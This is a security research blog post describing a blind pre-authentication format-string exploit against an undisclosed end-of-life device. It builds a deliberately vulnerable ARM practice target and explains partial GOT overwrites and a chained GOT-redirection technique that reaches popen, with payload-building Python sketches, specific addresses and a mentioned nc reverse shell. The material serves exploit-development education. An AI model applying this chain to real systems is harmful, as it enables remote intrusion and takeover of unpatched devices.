
Cascading Chaos: A GOT-Oriented Exploit Story


In this research blog, Team82 researcher Tomer Goldschmidt describes how he developed a unique binary exploitation method and used it to achieve full-chain remote code execution on an interesting target device.

Tomer was tasked with researching an end-of-life device that is no longer being updated by the vendor. Given this circumstance, he decided to publish this research without disclosing the affected platform, and is sharing the technique because it is beneficial to security researchers specializing in exploit development.

A security researcher's most lucrative reward, and ambition, is to pwn a system under assessment, ideally without prior knowledge of the specific system and without privileges on the target. This makes our research process difficult, but also that much more satisfying and intriguing. Like practical, technical challenges in other fields, this one is composed of many steps, each of which takes experience to hone.

One of the first things I find myself thinking about in these kinds of projects is sources and sinks in the system, places where my input could trickle down and where it could subvert said systems. Doing this reveals and highlights potential attack surfaces exposed to a remote attacker with no prior leverage over the system.

With this specific project, I did a little thinking, focusing on what could be beneficial for me in my hunt for vulnerabilities, and the primitives to use in trying to pwn this system and prove exploitability.

During the early phase of my research, I tinkered with the idea that even without being registered on the system and without having any functionality exposed to me, I still have one thing that I can manipulate that might present an undiscovered vulnerability: logging of user interactions with the system.

Even without an active session or login credentials, an attacker can easily cause logs to be created and has fine-grained control over their content. Following this line of thinking, I experimented with the login interface of the web platform and observed the effects on the log facility. I found that I could inject format string specifiers into the payloads I sent, and that the system evaluated them when writing log content that I had no way of reading.

Login input fields for our device.

This primitive exposes a format-string vulnerability that I could use to manipulate the application and eventually gain full control over the process. I will demonstrate how using only this primitive, I managed to achieve pre-authenticated remote code execution on this platform.

I figured that we need to have some kind of test subject to demonstrate our exploit development and novel technique. Therefore, I decided to implement a boiled down version of the application as the test platform on which to develop our exploit. This decision brings with it many advantages:

  • Having the source code enables us to focus on the exploit development

  • It also enables us fine-grained debugging capabilities and ease of testing

  • And also allows you to reproduce this experiment and sharpen your exploit development skills.

Phase 0: Understanding the Target

My target was a web service that enables remote configuration of the device with user session and authentication management. Additionally, the device ran a Linux-based operating system, making our target binary a dynamically linked ELF executable.


To make this research more useful, I present the development and exploitation processes together. With that in mind, we begin our journey by implementing the most basic application we can that follows the outline of my actual target application.

Our initial target sample source code.

With this version of our application, we can easily cause a memory leak.

Demonstration of the memory leak capability within this version of our application

This slightly deviates from the original premise because with my target, I had no memory leak and had only a blind format string exploit capability. To stick to the storyline we are going to change the practice application.

This preserves our primitive, and eliminates visibility.

Now that we have a scenario that is more suitable to our constraints, we can discuss exploiting format string vulnerabilities to overwrite memory of running processes. To exploit this vulnerability we utilize a known technique used often when exploiting format string vulnerabilities. This technique relies on a specific format specifier %n.

Snippet from the MAN for printf (man 3 printf)

To use this technique, the %n specifier in our format string must reference an argument that holds a pointer we control. This is possible by combining the $ positional syntax with the n conversion, which lets us specify the index of the argument whose target will be overwritten.

An example of our necessary format specifiers.

Using these features together with a specially crafted payload, format string equips us with an essential exploitation primitive of write-what-where. This means that we are able to overwrite content at arbitrary locations in the process memory with values we control.
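
As a rough illustration of the paragraph above, here is a minimal Python sketch that assembles such a format string. The helper name build_n_write, the value 0x40, and the argument index 7 are assumptions chosen for the example; the real index depends on where the controlled pointer sits relative to the printf arguments on the target.

```python
def build_n_write(value: int, arg_index: int) -> str:
    """Build a format string that stores `value` through the pointer
    found at positional argument `arg_index` (hypothetical helper)."""
    if value < 1:
        raise ValueError("this sketch needs at least one padded character")
    if arg_index < 1:
        raise ValueError("positional arguments are numbered from 1")
    # %<value>c prints one character padded to `value` columns, so the
    # running output count equals `value` when %n is reached.
    # %<arg_index>$n then stores that count through the selected pointer.
    return f"%{value}c%{arg_index}$n"


payload = build_n_write(0x40, 7)
print(payload)  # %64c%7$n
```

The "what" is the number of characters printed before %n, and the "where" is whatever pointer occupies the selected argument slot.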

Phase 1: Emulating Target System

This technique will prove to be very impactful to researchers doing similar work. But before trying to exploit this version of our compiled application, we need to address the fact that our target device was an ARM-based machine, not an x86 64-bit one. You may have noticed that our memory leak example shows 64-bit memory values rather than 32-bit ones, which highlights the difference between our current version and the target I worked with.

To be more accurate, we will go the extra mile and compile our target for a 32-bit ARM system. To do so, I will demonstrate how I use QEMU to set up a 32-bit ARM system running the lightweight Debian wheezy distribution.

Emulating this system was not daunting given our previous research on the Planet WGS-804HPT industrial switches, in which we provide explanation for how to emulate a MIPS guest operating system in a similar fashion:

#!/bin/sh
wget https://people.debian.org/~aurel32/qemu/armel/debian_wheezy_armel_standard.qcow2
wget https://people.debian.org/~aurel32/qemu/armel/initrd.img-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/vmlinuz-3.2.0-4-versatile

qemu-system-arm \
	-M versatilepb \
	-kernel vmlinuz-3.2.0-4-versatile \
	-initrd initrd.img-3.2.0-4-versatile \
	-hda debian_wheezy_armel_standard.qcow2 \
	-append "root=/dev/sda1 console=ttyAMA0" \
	-netdev user,id=net0,hostfwd=tcp::2222-:22,hostfwd=tcp::1111-:1111 \
	-device rtl8139,netdev=net0 \
	-nographic

Now we have the qemu-system-arm virtual machine set up:

We need to point apt-get at the Debian archive, because this release has reached end of support.

root@debian-armel:~# echo "deb http://archive.debian.org/debian/ wheezy main non-free contrib
deb-src http://archive.debian.org/debian/ wheezy main non-free contrib
" > /etc/apt/sources.list
root@debian-armel:~# apt-get update
root@debian-armel:~# apt-get install debian-archive-keyring
root@debian-armel:~# apt-get update
root@debian-armel:~# apt-get install gcc

And voilà, we have ourselves an ARM compilation virtual machine at our disposal. Note that the SSH service on our guest is exposed on port 2222 of our host machine, so we use this port to transfer our main C code module to our compilation server.

HOST@Ubuntu:~$ scp -P 2222 ./main.c root@localhost:~/main.c
...

To compile our target executable so that it matches our real target, we need to pass compiler arguments that disable some protections. Specifically these:

  • -no-pie : Means our binary segments will load in the same memory regions every time.

  • -Wl,-z,norelro : Disables RELRO (relocation read-only). Imported symbols are still resolved at run time through the GOT, a table of pointers stored in the .got section of the compiled ELF binary, but the table stays in a read-write memory segment instead of a read-only one.
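
To make the effect of these two flags concrete, the following Python sketch inspects a little-endian 32-bit ELF image and reports whether it looks position independent and whether it carries a RELRO program header. The function name elf32_protections and the a.out path are assumptions for illustration. Treating e_type == ET_DYN as "PIE" is a simplification, since shared objects use the same type.

```python
import struct

ET_DYN = 3                   # e_type used by position-independent executables
PT_GNU_RELRO = 0x6474E552    # program header type present when RELRO is enabled


def elf32_protections(image: bytes) -> dict:
    """Report PIE and RELRO status for a little-endian ELF32 image."""
    if image[:4] != b"\x7fELF" or image[4] != 1 or image[5] != 1:
        raise ValueError("expected a little-endian ELF32 image")
    (e_type,) = struct.unpack_from("<H", image, 16)       # file type
    (e_phoff,) = struct.unpack_from("<I", image, 28)      # program header offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 42)
    # p_type is the first 32-bit field of every ELF32 program header.
    p_types = [
        struct.unpack_from("<I", image, e_phoff + i * e_phentsize)[0]
        for i in range(e_phnum)
    ]
    return {"pie": e_type == ET_DYN, "relro": PT_GNU_RELRO in p_types}


# Usage (the path is an assumption):
# with open("a.out", "rb") as fh:
#     print(elf32_protections(fh.read()))
```

For a binary built with the two flags above, both values would be expected to come back False.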

So the commands used to compile the sample on our 32-bit ARM guest compilation machine should look like this:

HOST@Ubuntu:~$ ssh -p 2222 root@localhost
root@debian-armel:~# gcc ./main.c -no-pie -Wl,-z,norelro
root@debian-armel:~# exit
...
HOST@Ubuntu:~$ scp -P 2222 root@localhost:~/a.out ./a.out

And it should result in an executable with the following characteristics:

Reviewing protection imposed in our sample executable using the checksec tool.

One more thing to do is to install socat and use it to get our practice range up and running.

GUEST:~# apt-get install socat
...
GUEST:~# socat TCP-LISTEN:1111,fork,reuseaddr EXEC:./a.out

Running our practice remote application service on our guest Debian emulated machine

Testing our practice remote application service.

Phase 2: An Exploit Checklist

To showcase the novel technique used in this research, I need to set the stage a little bit more. A thing to note is that my target was a beefy executable with many intricate functionalities. This made my technique possible because it satisfied the following requirements:

  • A format string vuln primitive triggerable on demand repeatedly

  • Partial-RELRO/No-RELRO - enabling GOT entries overwriting

  • A function that returns a GLOBAL variable

For this we need a slightly more complicated practice sample. I developed a program that meets these preconditions to showcase the novel exploitation technique from this research.

The target program we are going to exploit.

A Write-What-Where Primitive

Having the target compiled, we may go ahead and start debugging; we run the sample with qemu-arm-static and provide the -g argument to attach a gdbserver to the process.

Running the program with gdbserver attached to the process.

When we compare the content of the log file with the stack contents shown in our connected remote pwndbg session, we can see that our format string references stack content further down.

Stack content associated by our payload format-string

Contents of the logs.txt file with our payload result


Now if we look further down the stack, we can see that our payload string is itself located on the stack. This gives us control over the pointer values that our format string references.

Our own payload string buffer located on the stack and referenced in our log result.

Unhexed bytes from our log result.

This effectively means we have a write-what-where primitive, which is a critical component in our exploitation attempt.
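
The "unhexing" step can be sketched in Python as follows. The dump string, its dot separator, and the AAAA marker are made-up illustrative values, not output from the real target. The sketch assumes the log holds 32-bit words printed with %x-style specifiers on a little-endian ARM system.

```python
import struct


def unhex_words(dump: str, sep: str = ".") -> bytes:
    """Turn '%x'-style 32-bit words back into the bytes they had in memory."""
    words = [int(w, 16) for w in dump.split(sep) if w]
    # Little-endian: the lowest byte of each word comes first in memory.
    return b"".join(struct.pack("<I", w) for w in words)


def find_arg_index(dump: str, marker: bytes, first_index: int = 1, sep: str = "."):
    """Return the positional index of the word equal to `marker`, or None."""
    raw = unhex_words(dump, sep)
    for offset in range(0, len(raw), 4):
        if raw[offset:offset + 4] == marker:
            return first_index + offset // 4
    return None


# Hypothetical log line produced by a payload that starts with "AAAA%08x".
dump = "be8ff6a4.00000040.41414141.78383025"
print(unhex_words(dump)[8:])           # b'AAAA%08x'
print(find_arg_index(dump, b"AAAA"))   # 3
```

Once the index of our own buffer is known, any address placed at that position in the payload becomes the pointer a later %n writes through.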

Another Format-String Exploitation Trick

When developing our format-string payload, we can reference a specific argument directly and have it dereferenced into the formatted output. This is achieved with another format string control character.

Printf MAN page snippet regarding the $ format specifier control character (man 3 printf)

This trick makes our exploit payload shorter and more concise. Using it, we can reference a specific argument without having to step through all the preceding ones in our format string payload.

Overwriting GOT Entries

The global offset table (GOT) is a table of pointers located in a corresponding section called .got inside a compiled ELF binary. This section allows relocatable code, which may be loaded at varying memory locations, to be found and resolved by the main program code. In other words, the main code of the executable uses this section to resolve the location of imported symbols and relocations. The important thing to understand about the .got section when developing a memory corruption exploit is that it contains function pointers, often resolved to shared object code.

Resolved GOT entries from debugging session of the application process

For instance, in the image above we can see the standard library function puts that enables printing to standard output, and the address in which its implementation is located in memory.

So theoretically, we can take the .got entry holding the function pointer for some standard library function we know gets called later in the program and overwrite it with our own pointer to a different memory location.

Partial Address Overwrite With Format String Vulns

With the knowledge we have, we can continue on toward implementing a successful exploitation method. Our goal is to call a shared library function that allows us to execute shell commands, whether it be system/popen/exec.

Deciding which GOT entry to overwrite, and with what, is not straightforward. As we interact with the application process, we don’t know where the shell command execution functions are located in memory, so we are effectively blind in that regard.


Not all is lost, however. We still have functions from the standard shared library that have resolved entries in our GOT section, meaning that we might have the opportunity to partially overwrite one of those. This is where the length modifiers of format strings come into play.

Format modifier allowing us a byte-by-byte overwrite capability

Having this feature makes it possible for us to do a partial overwrite of a single byte from the address stored in a GOT entry pointing to some function implemented in the shared library.


It is important to note that this is useful because shared library code is loaded at a fixed offset relative to the base of its segment, so the distance between any two functions in the library is constant. This means we can calculate, before implementing our exploit, the offset between our target popen function and a function that already has a resolved GOT entry.

Now say the offset between a function with a resolved entry and the function we want to call is small enough. In that case we might only need to overwrite the least significant byte of the address, whose value is constant due to address alignment.

Imported functions relative offsets in standard shared library

In our case for instance we can overwrite the least significant byte of the puts resolved address from 0xc0 to 0x34 and we have the address just right.
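
The arithmetic behind this one-byte patch can be sketched in Python. The 0xc0 and 0x34 bytes come from the text above. The full address 0x76e7a5c0, the argument index 7, and the helper names are assumptions for illustration only.

```python
def patch_lsb(address: int, new_lsb: int) -> int:
    """Model what a one-byte overwrite does to a resolved GOT entry."""
    return (address & ~0xFF) | (new_lsb & 0xFF)


def build_hhn_write(byte_value: int, arg_index: int, printed: int = 0) -> str:
    """Format string fragment that stores `byte_value` with %hhn.

    %hhn keeps only the low 8 bits of the output count, so the padding is
    computed modulo 256 from what was already printed.
    """
    pad = (byte_value - printed) % 256
    prefix = f"%{pad}c" if pad else ""
    return f"{prefix}%{arg_index}$hhn"


resolved_puts = 0x76E7A5C0                   # hypothetical resolved address
print(hex(patch_lsb(resolved_puts, 0x34)))   # 0x76e7a534
print(build_hhn_write(0x34, 7))              # %52c%7$hhn
```

The trick only works when both functions share every address byte above the lowest one, which is why the distance between them has to be checked against the library file beforehand.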

Phase 4: The Technique: Cascading GOT Call Chain

With almost every aspect of the exploit implementation surveyed, we are left with the last hurdle ahead of us: chaining an effective code flow that calls a target libc function like popen and having control over the parameters to that target function. For instance in this scenario we need to have control over the R0 register and over R1.

The solution that finally allowed me to implement an exploit chain was to set up the GOT entries for libc functions as domino pieces that eventually tumble in a chain reaction that leads to executing a shell command. The main insight behind this idea was that merely by molding different values into the GOT entries, we pretty much control what the code is doing. All we need to do is adapt to the code patterns in the program in a way that makes sense.

And to really understand how this method works we need to go straight to the actual exploit.

Note: Here also comes into play our precondition for a function returning a global variable.

get_glob() inner method returning a global variable we can control using write-what-where

As a result:

  • We have a function that returns a variable we control.

  • We know its absolute location in the memory.

  • We can set any libc function to direct code flow into this target method.

  • We can also set any other libc function pointers in the GOT to any absolute/partial value.

  • We can determine which of the libc function pointers we control get used consecutively.
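
The domino idea can be modeled with a toy Python simulation in which every library call goes through a dictionary standing in for the GOT. This is only a sketch: the three site_* functions are hypothetical stand-ins for call sites inside the program, and libc_popen merely records its argument instead of running anything.

```python
calls = []  # trace of the stand-in functions that actually ran


def libc_fgets(*args):
    calls.append("fgets")


def libc_fopen(*args):
    calls.append("fopen")


def libc_strdup(*args):
    calls.append("strdup")


def libc_puts(*args):
    calls.append("puts")


def libc_popen(command, *args):
    calls.append(("popen", command))  # stand-in only: nothing is executed


glob_err_str = {"ptr": "some error text"}  # the global we can overwrite


def get_glob():
    return glob_err_str["ptr"]


got = {"fgets": libc_fgets, "fopen": libc_fopen,
       "strdup": libc_strdup, "puts": libc_puts}


# Hypothetical call sites inside the program; each ends in a GOT call.
def site_fopen(*args):
    return got["fopen"](get_glob())  # get_glob() result becomes argument 0


def site_strdup(r0, *args):
    return got["strdup"](r0)


def site_puts(r0, *args):
    return got["puts"](r0)


def main_loop_iteration():
    return got["fgets"]()  # the call the program makes naturally


# Place the dominoes from last to first; the trigger is written last.
got["puts"] = libc_popen
got["strdup"] = site_puts
got["fopen"] = site_strdup
glob_err_str["ptr"] = "id"
got["fgets"] = site_fopen

main_loop_iteration()
print(calls)  # [('popen', 'id')]
```

None of the original library stand-ins run. The single natural call to fgets falls through three redirected entries and ends in popen with the controlled string as its first argument.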

Phase 5: Putting It All Together

To stitch everything together, here is the flow of our exploit:

  • We iteratively write our shell command in memory

Write the shell command pair by pair of bytes (short)

As you can see, we send our shell command string little by little, overwriting a writable memory area that we chose in advance to hold our shell command.

  • We partially overwrite the GOT entry for puts, changing its least significant byte to the least significant byte of the address of popen. Remember that the two functions are close enough to sit in the same alignment chunk, which makes our one-byte overwrite exactly what is needed to turn puts into popen.

  • This is the equivalent of placing the last domino piece in our column of dominos. The puts/popen won’t get called until we let them be called. (Starting from the end to the beginning).

Effectively replacing puts with popen.

  • Setting strdup to the program absolute address 0x8998.

The strdup function will then direct code flow to the point in code where a call to puts/popen is located.

Exploit chain, last two parts.

  • Setting fopen to the program absolute address 0x882c.

Exploit chain, last three parts

  • Setting GLOB_ERR_STR symbol to point at our shell command payload.

By doing so we make the get_glob method return our own shell command payload string pointer into register R0.

  • Setting fgets to the program absolute address 0x8808.

Doing this makes fgets, which is naturally called on each iteration of the program loop, direct code flow into our exploit chain. This is the first domino piece in our chain, and writing it is also the trigger that starts the chain reaction.

The logic code flow of our exploit.
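
The first step of this flow, writing the shell command two bytes at a time, can be sketched in Python as follows. The base address 0x11000, the argument index 7, and the helper names are assumptions. Placing each target address inside the payload so that the chosen index refers to it depends on the target's stack layout and is left out of this sketch.

```python
import struct


def split_into_shorts(command: bytes, base_addr: int):
    """Split a NUL-terminated command into (address, 16-bit value) pairs."""
    data = command + b"\x00"
    if len(data) % 2:
        data += b"\x00"  # pad to a whole number of shorts
    return [
        (base_addr + off, struct.unpack_from("<H", data, off)[0])
        for off in range(0, len(data), 2)
    ]


def build_hn_write(value: int, arg_index: int, printed: int = 0) -> str:
    """Format string fragment that stores a 16-bit `value` with %hn."""
    pad = (value - printed) % 0x10000  # %hn keeps the low 16 bits of the count
    prefix = f"%{pad}c" if pad else ""
    return f"{prefix}%{arg_index}$hn"


# One request per short, since the primitive can be triggered repeatedly.
for address, value in split_into_shorts(b"id", 0x11000):
    print(hex(address), build_hn_write(value, 7))
# 0x11000 %25705c%7$hn
# 0x11002 %7$hn
```

Writing shorts rather than full words keeps the padding under 65,536 characters per request.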

With our full exploit chain implemented in a compact Python script using pwnlib, we are able to remotely execute an nc reverse shell command on the emulated guest system, which connects back to our listening client on our host.

Wrapping Up

We presented a novel technique that we previously used to achieve remote code execution on an end-of-life device that is no longer updated by the vendor.

We developed a full-chain remote code execution on the target system by leveraging a pre-authenticated format-string vulnerability. This allowed us to gain a write-what-where primitive, which was then used to overwrite Global Offset Table (GOT) entries. 

We also demonstrated how to set up an emulated ARM 32-bit environment for exploit development and introduced the "Cascading GOT Call Chain" technique. 

This method involves chaining together GOT entry overwrites to control code flow and execute arbitrary shell commands. 

The research provides a practical guide for security researchers to develop similar exploits, even in the absence of memory leak primitives.
